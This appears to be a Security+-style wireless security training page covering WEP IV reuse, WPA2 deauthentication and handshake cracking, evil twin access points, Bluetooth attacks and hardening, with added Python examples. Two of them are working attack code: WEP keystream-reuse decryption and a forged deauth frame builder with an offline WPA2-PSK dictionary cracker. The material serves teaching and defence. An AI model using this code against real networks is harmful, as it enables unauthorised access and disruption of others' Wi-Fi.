WEP (Wired Equivalent Privacy) Simulator

Understand why the 24-bit Initialization Vector (IV) makes WEP highly insecure.

1. Sniffing and Packet Injection

WEP encrypts every frame with the RC4 stream cipher, keyed with a 24-bit Initialization Vector (sent in the clear) prepended to the shared secret key. Only 2^24 (about 16.7 million) IVs exist, and cards pick them sequentially or at random, so on a busy network the same IV, and therefore the same RC4 keystream, recurs after a few thousand frames. Attackers speed this up by capturing an encrypted ARP request and replaying it: the AP relays each copy re-encrypted under a fresh IV and the target answers, so new IVs arrive at thousands per second instead of at the pace of normal traffic.


Network Traffic Visualizer: WEP Router, Client, Kali Attacker

2. Decryption & Key Recovery

Once enough IVs and their encrypted frames are collected (generally 20,000 - 50,000 packets for a 64-bit WEP key, i.e. a 40-bit secret plus the 24-bit IV, with the PTW attack; the older FMS/KoreK attacks needed far more), statistical biases in RC4's first keystream bytes, combined with the known first plaintext byte of every frame (the 0xAA of the LLC/SNAP header), let the attacker vote on each key byte and recover the full key in seconds rather than by brute force.
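The following Python example is added to this page to show concretely what step 1 is collecting and why a repeated IV is fatal; it is not part of the original simulator. It implements RC4 and WEP framing in the standard library only, captures a few constructed frames, finds an IV collision, recovers the keystream from a frame whose plaintext the attacker knows (an ARP request, assumed fully known here: the MACs are visible in the 802.11 header and the IPs are guessed; in practice at least the first 16 bytes of SNAP and fixed ARP fields are always known), and decrypts the other frame sent under that IV without ever using the key. The statistical key recovery of step 2 is not implemented.

```python
"""Why a repeated WEP IV is fatal: same IV + same key gives the same RC4 keystream,
so one frame with known plaintext decrypts every other frame sent under that IV.
Standard library only; every frame below is constructed, not captured."""
import math
import zlib
from collections import defaultdict


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by the keystream generator (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR up to the length of the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, then RC4(IV || key) applied to
    payload || CRC-32 ICV. The IV is the only thing that varies per frame."""
    icv = zlib.crc32(payload).to_bytes(4, "little")
    plaintext = payload + icv
    return iv + xor(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


def wep_decrypt(wep_key: bytes, frame: bytes) -> bytes:
    """Legitimate receiver: strip the IV, decrypt, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor(body, rc4_keystream(iv + wep_key, len(body)))
    payload, icv = plaintext[:-4], plaintext[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


# LLC/SNAP header that starts every WEP data payload; its 0xAA is the known
# first plaintext byte that the FMS/PTW key-recovery attacks also rely on.
SNAP = bytes.fromhex("aaaa03000000")


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """SNAP + ARP request. Its fixed 36-byte size is how attackers spot ARP
    frames in a capture without decrypting them."""
    return (SNAP + b"\x08\x06" + b"\x00\x01\x08\x00\x06\x04\x00\x01"
            + sender_mac + sender_ip + b"\x00" * 6 + target_ip)


def find_iv_collisions(frames):
    """Group captured frames by IV; any IV seen twice is a keystream reuse."""
    by_iv = defaultdict(list)
    for f in frames:
        by_iv[f[:3]].append(f)
    return {iv: fs for iv, fs in by_iv.items() if len(fs) > 1}


def recover_keystream(frame: bytes, known_payload: bytes) -> bytes:
    """Ciphertext XOR known plaintext = keystream. The ICV is a CRC of the
    plaintext, so it is known too and yields four extra keystream bytes."""
    known = known_payload + zlib.crc32(known_payload).to_bytes(4, "little")
    return xor(frame[3:], known)


def decrypt_with_keystream(frame: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame under the same IV, as far as the keystream reaches."""
    return xor(frame[3:], keystream)


def expected_frames_to_collision(iv_bits: int = 24) -> int:
    """Birthday bound: with random IVs a repeat is more likely than not after
    sqrt(2 ln 2 * 2^iv_bits) frames, about 4,800 for WEP's 24-bit IV."""
    return int(math.sqrt(2 * math.log(2) * 2 ** iv_bits))


def demo() -> bytes:
    """Attacker side: the key is used only to build the capture, never to attack it."""
    wep_key = bytes.fromhex("0123456789")   # constructed 40-bit key ("64-bit WEP")
    colliding_iv = bytes.fromhex("c0ffee")
    arp = arp_request(bytes.fromhex("001122334455"), bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1]))
    secret = SNAP + b"\x08\x00" + b"POST /login pw=hunter2"  # stand-in IPv4 payload, shorter than the ARP
    captured = [
        wep_encrypt(wep_key, bytes.fromhex("000001"), b"unrelated"),
        wep_encrypt(wep_key, colliding_iv, arp),      # recognisable as ARP by its size
        wep_encrypt(wep_key, bytes.fromhex("000002"), b"unrelated"),
        wep_encrypt(wep_key, colliding_iv, secret),   # same IV: same keystream
    ]
    arp_frame, victim_frame = find_iv_collisions(captured)[colliding_iv]
    keystream = recover_keystream(arp_frame, arp)     # assumed: attacker knows the ARP plaintext
    return decrypt_with_keystream(victim_frame, keystream)[:-4]   # drop the ICV


if __name__ == "__main__":
    print("frames until an IV repeat is likely:", expected_frames_to_collision())
    print("decrypted without the key:", demo())
```

Note that nothing in the attack path touches `wep_key`; the RC4 keystream leaks through the known plaintext alone. The birthday bound also explains why collisions show up long before all 16.7 million IVs are exhausted.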


WPA2 Deauth & Handshake Dictionary Attack

Simulate sending deauthentication packets to capture the 4-way handshake, then perform a dictionary attack.

1. Send Deauth & Capture Handshake

802.11 management frames, including deauthentication, carry no encryption or integrity protection unless Protected Management Frames (802.11w) is enabled, and WPA2 does not require it. An attacker therefore forges a deauthentication frame with the AP's BSSID as the sender and the client as the destination; the client obeys it and drops its association. When the client reconnects automatically, the attacker sniffs the 4-way handshake. Only the first two messages matter for cracking: the AP's ANonce in message 1 and the client's SNonce plus MIC in message 2.


Attack Animation: WPA2 AP, Legit Client, Attacker (Kali)

2. Dictionary Attack on Captured Handshake

The handshake never carries the passphrase or the PMK (pairwise master key) itself. The PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations); both sides derive the PTK from the PMK, the two nonces and the two MAC addresses, and message 2 is authenticated with a MIC computed under the first 128 bits of the PTK (the KCK). Because WPA2-PSK uses one shared secret, everything needed to test a guess (SSID, MACs, nonces, MIC) sits in the capture, so attackers run dictionary attacks offline, without interacting with the network and at whatever speed their hardware allows.

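The two steps above, as an added Python example that is not part of the original simulator: it builds the raw deauthentication frame bytes (reason code 7, the one aireplay-ng sends; actually transmitting it needs a monitor-mode interface and is not done here), then performs the offline part end to end with the standard library: PBKDF2 for the PMK, the 802.11 PRF-512 for the PTK, and an HMAC-SHA1 MIC check on a constructed EAPOL-Key message 2. The SSID, MAC addresses, nonces, passphrase and wordlist are all constructed; the PMK test vector in the usage notes is the published one from IEEE 802.11.

```python
"""Deauth frame construction plus an offline WPA2-PSK dictionary attack.
Standard library only; all handshake material is constructed, not captured."""
import hashlib
import hmac


def build_deauth_frame(client_mac: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Raw 802.11 deauthentication frame (no FCS) with the AP spoofed as sender.
    Reason 7 = class 3 frame received from a non-associated station."""
    frame_control = b"\xc0\x00"   # type = management, subtype = deauthentication
    duration = b"\x3a\x01"
    seq_ctrl = b"\x00\x00"
    return (frame_control + duration + client_mac + bssid + bssid + seq_ctrl
            + reason.to_bytes(2, "little"))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11: PTK = PRF(PMK, "Pairwise key expansion",
    min(MACs) || max(MACs) || min(nonces) || max(nonces)). KCK = first 16 bytes."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):   # 4 x 20 bytes of HMAC-SHA1 output >= 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


MIC_OFFSET = 81   # EAPOL header (4) + Key Descriptor fields preceding the Key MIC (77)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for WPA2/CCMP (descriptor version 2): HMAC-SHA1 over the EAPOL-Key
    frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """EAPOL-Key message 2 (client -> AP): carries SNonce and a MIC under the KCK.
    Constructed minimal frame: empty key data, zero IV/RSC/ID, replay counter 1."""
    key_info = b"\x01\x0a"   # MIC bit, pairwise bit, descriptor version 2
    body = (b"\x02" + key_info + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, msg2, wordlist):
    """Every input comes from the capture; nothing is sent to the network.
    Returns the matching passphrase or None."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid),
                         ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return candidate
    return None


def demo() -> str:
    """Constructed network, handshake and wordlist (not a real capture)."""
    ssid = "CorpGuest"
    ap_mac = bytes.fromhex("aabbccddeeff")
    client_mac = bytes.fromhex("112233445566")
    anonce = bytes(range(32))
    snonce = bytes(range(100, 132))
    real_passphrase = "letmein123"
    kck = derive_ptk(pmk_from_passphrase(real_passphrase, ssid),
                     ap_mac, client_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, kck)   # what the sniffer sees after the deauth
    return crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, msg2,
                           ["password", "123456", "letmein123", "qwerty"])


if __name__ == "__main__":
    print("deauth frame:", build_deauth_frame(bytes.fromhex("112233445566"),
                                              bytes.fromhex("aabbccddeeff")).hex())
    print("recovered passphrase:", demo())
```

The cost per guess is one PBKDF2 run of 4096 HMAC-SHA1 rounds plus four more HMACs; tools such as aircrack-ng and hashcat do exactly this, only faster. Against a WPA3-SAE network the same capture yields nothing, because the exchange is a password-authenticated key agreement rather than a MIC over a passphrase-derived key. A sanity check for the PMK step is the IEEE 802.11 test vector: passphrase "password" with SSID "IEEE" gives PMK f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e.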

Rogue Access Point & Evil Twin Attack

Understand how client devices auto-connect to cloned Wi-Fi access points with stronger signals.

1. Create Cloned AP (Evil Twin)

An Evil Twin is a rogue AP advertising the same SSID (network name) as a legitimate network. Client devices keep saved profiles and, when several APs advertise a saved SSID with the matching security type, join the one with the strongest signal, so the attacker raises transmit power or uses a directional antenna, and often deauthenticates the client from the real AP to force the roam. Against an open network this alone puts the attacker in the traffic path. Against WPA2-PSK the twin cannot complete the 4-way handshake without the passphrase, so the attacker either captures the client's message 2 for offline cracking or relies on the captive portal below to trick the user.

Active Signal & Roaming Analysis: Legit AP (-80 dBm, weak), Client Laptop, Evil Twin (-95 dBm, off)

2. Captive Portal Credential Harvesting

Once connected to the Evil Twin, the attacker displays a fake captive portal page requesting credentials (e.g. "Firmware Update Required" or "WPA Re-authentication").


Bluetooth Vulnerabilities (Bluesnarfing & Bluejacking)

Understand RF discovery threats, unsolicited message spam, and unauthorized data theft.

1. Target Bluetooth Settings

Non-discoverable mode hides a device from inquiry scans but does not by itself make it secure. In "Discoverable" mode the device answers inquiries from any radio in range (about 10 metres for a Class 2 device), revealing its name, device class and 48-bit hardware address (BD_ADDR); a device that is merely connectable can still be reached by an attacker who learns its BD_ADDR by sniffing an active connection.


2. Execute Bluetooth Exploit

Select an exploit to deploy against the discovered target (Attacker, Target Phone).

Wi-Fi & RF Security Mitigation Hub

Test your knowledge and configure settings to protect wireless networks from these attacks.

Router & Device Hardening Configuration

Toggle security options on the simulated systems and see how the defense status changes.

Upgrade to WPA3: SAE (Simultaneous Authentication of Equals) replaces the PSK handshake with a password-authenticated key exchange, so a captured exchange gives an attacker only one password guess per active attempt and no offline dictionary attack.
Enable Protected Management Frames (PMF, 802.11w): deauthentication and disassociation frames are integrity-protected with a key only the AP and client hold, so forged deauth frames are discarded. Mandatory in WPA3, optional in WPA2.
Disable WPS (Wi-Fi Protected Setup): the 8-digit PIN is verified in two halves and its last digit is a checksum, so online brute force needs at most about 11,000 attempts rather than 10^8. Turn it off.
Deploy WIDS/WIPS & 802.1X: a wireless IDS/IPS monitors the spectrum for unknown BSSIDs advertising your SSID (evil twins) and for deauth floods, and alerts administrators; 802.1X/EAP with server-certificate validation on the client keeps a rogue AP from harvesting reusable credentials.
Disable Bluetooth Discoverability: stops the device answering inquiry scans, so an attacker cannot locate its BD_ADDR by scanning.
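The following Python example is added to this page (not part of the original simulator) to show the WIDS/WIPS control above against the Evil Twin roaming behaviour described earlier. It compares a constructed beacon scan against an assumed inventory of authorised APs (the `AUTHORIZED` table, SSIDs, BSSIDs and signal levels are all made up), shows which AP a client's "strongest matching signal" rule would pick, and raises an alert for any BSSID that advertises the organisation's SSID without being in the inventory, or that carries the wrong security type.

```python
"""Evil-twin detection: compare observed beacons against an inventory of authorised
APs. Scan data and inventory are constructed for the example."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str       # AP MAC address
    channel: int
    rssi: int        # dBm; closer to 0 is stronger
    security: str    # "OPEN", "WPA2-PSK", "WPA3-SAE"


# Assumed inventory of the organisation's own APs: SSID -> {BSSID: expected security}
AUTHORIZED = {
    "CorpWiFi": {
        "aa:bb:cc:dd:ee:01": "WPA2-PSK",
        "aa:bb:cc:dd:ee:02": "WPA2-PSK",
    },
}


def client_choice(beacons, saved_ssid, saved_security):
    """What a roaming client does: among APs advertising the saved profile's SSID
    with the same security type, pick the strongest signal. No BSSID check at all."""
    matching = [b for b in beacons if b.ssid == saved_ssid and b.security == saved_security]
    return max(matching, key=lambda b: b.rssi) if matching else None


def detect_rogues(beacons, authorized=AUTHORIZED):
    """WIDS logic: our SSID from a BSSID we do not own is an evil twin; one of our
    BSSIDs with the wrong security type is a spoofed BSSID or a misconfiguration."""
    alerts = []
    for b in beacons:
        known = authorized.get(b.ssid)
        if known is None:
            continue   # someone else's network, not ours to police
        if b.bssid not in known:
            alerts.append(("EVIL_TWIN", b.bssid, f"ssid={b.ssid} ch={b.channel} rssi={b.rssi}"))
        elif known[b.bssid] != b.security:
            alerts.append(("SECURITY_MISMATCH", b.bssid,
                           f"expected={known[b.bssid]} seen={b.security}"))
    return alerts


# Constructed scan: two legitimate APs, an unrelated network, and a much louder twin.
SCAN = [
    Beacon("CorpWiFi", "aa:bb:cc:dd:ee:01", 6, -80, "WPA2-PSK"),
    Beacon("CorpWiFi", "aa:bb:cc:dd:ee:02", 11, -85, "WPA2-PSK"),
    Beacon("CoffeeShop", "10:20:30:40:50:60", 1, -70, "OPEN"),
    Beacon("CorpWiFi", "de:ad:be:ef:00:01", 6, -40, "WPA2-PSK"),   # evil twin
]

if __name__ == "__main__":
    print("client would join:", client_choice(SCAN, "CorpWiFi", "WPA2-PSK").bssid)
    for alert in detect_rogues(SCAN):
        print(*alert)
```

The client-side rule and the WIDS rule look at the same beacons and reach opposite conclusions: the client has no notion of an authorised BSSID, which is exactly why the twin wins, while the WIDS keys on BSSID ownership, which the attacker cannot forge without also spoofing the real AP's address on its channel. Most commercial WIPS products add location or signal-fingerprint checks for that spoofed-BSSID case.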

Network Security Shield

🛡️ VULNERABLE (all hardening options off)

With no hardening applied, the simulated network has critical weaknesses:

❌ Vulnerable to Deauthentication Attacks
❌ Vulnerable to Offline Handshake Cracking
❌ Vulnerable to WPS PIN Brute-force
❌ Vulnerable to Evil Twin Access Points
❌ Bluetooth Discoverability Broadcast is Active

Security+ Wireless Key Takeaways

What is the difference between Bluejacking and Bluesnarfing?

Bluejacking is sending unsolicited messages to Bluetooth-enabled devices (annoying but harmless). Bluesnarfing is the unauthorized access of information (contacts, emails, text messages) from a wireless device over a Bluetooth connection.

What is Bluebugging?

Bluebugging goes beyond stealing files (snarfing); it allows an attacker to take complete control of the device, make phone calls, send messages, and listen in on conversations.

How does an Evil Twin attack exploit client roaming?

Client devices save Wi-Fi profiles and automatically reconnect to any AP advertising a saved SSID with the same security type, picking the one with the highest RSSI (received signal strength indicator). An evil twin wins that comparison with higher transmit power or a high-gain antenna, usually after deauthenticating the client from the legitimate AP to trigger the roam.

What is RFID vs. NFC?

RFID (Radio Frequency Identification) covers a family of tag technologies read at ranges from a few centimetres up to several metres for UHF tags. NFC (Near Field Communication) builds on the 13.56 MHz RFID standards (ISO/IEC 14443) and is limited to close proximity (under 10 cm); it is what contactless payments use. Both can be read by an unauthorized reader in range (skimming), or relayed to a distant reader, unless the tag is shielded or the application authenticates the reader.